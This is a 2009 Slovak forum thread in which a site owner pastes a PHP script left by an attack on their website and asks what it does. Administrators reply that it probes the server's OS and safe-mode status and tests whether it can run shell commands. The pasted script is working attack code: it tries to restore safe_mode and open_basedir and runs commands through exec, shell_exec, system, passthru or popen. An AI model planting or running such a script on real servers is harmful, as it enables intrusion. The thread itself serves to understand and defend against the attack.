Zákerný útok !.. o čo ide??

Sekcia: Programovanie 09.11.2009 | 19:26
Absolutne nespokojny   Návštevník
Zaznamenal som útok na moju stránku, ktorý smeruje na tento odkaz: odkaz na txt O čo ide v tomto kóde ?????????
--------------------------------------------- <html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>
    • Re: Zákerný útok !.. o čo ide?? 09.11.2009 | 22:36
      Avatar bedňa antiX, Devuan, LegacyIce  Administrátor
      Nechce sa mi to celé lúštiť, ale vyzerá to že ten človek sa pokúša vylistovať obsah tvojho webu aby napríklad zistil či tam, nemáš heslo do databázy a pod, nepoužívaš nähodou joomlu? Tá mala nejaký bug, treba upgrade.
      Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
      • Re: Zákerný útok !.. o čo ide?? 10.11.2009 | 00:07
        Avatar Milan Dvorský debian,mint kde,android  Administrátor
        kod sa snazi zistit, na akom OS bezi server, nasledne zistuje gid, potom zistuje, ci je zapnuty safemode a skusa otvorit adresar. s tym, ze nasledne sa snazi skusit ten script, ci vie vykonat passthru, exec, system a pod, ktore vlastne vedia na unix based strojoch vykonat napriklad aj shellovy (v tomto pripade podstrceny) command, ktory by otvoril cestu utocnikovi na server. a plus to, co spominal bedna ...
    • Re: Zákerný útok !.. o čo ide?? 10.11.2009 | 12:30
      Avatar dodoedo Fedora Linux  Používateľ
      G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."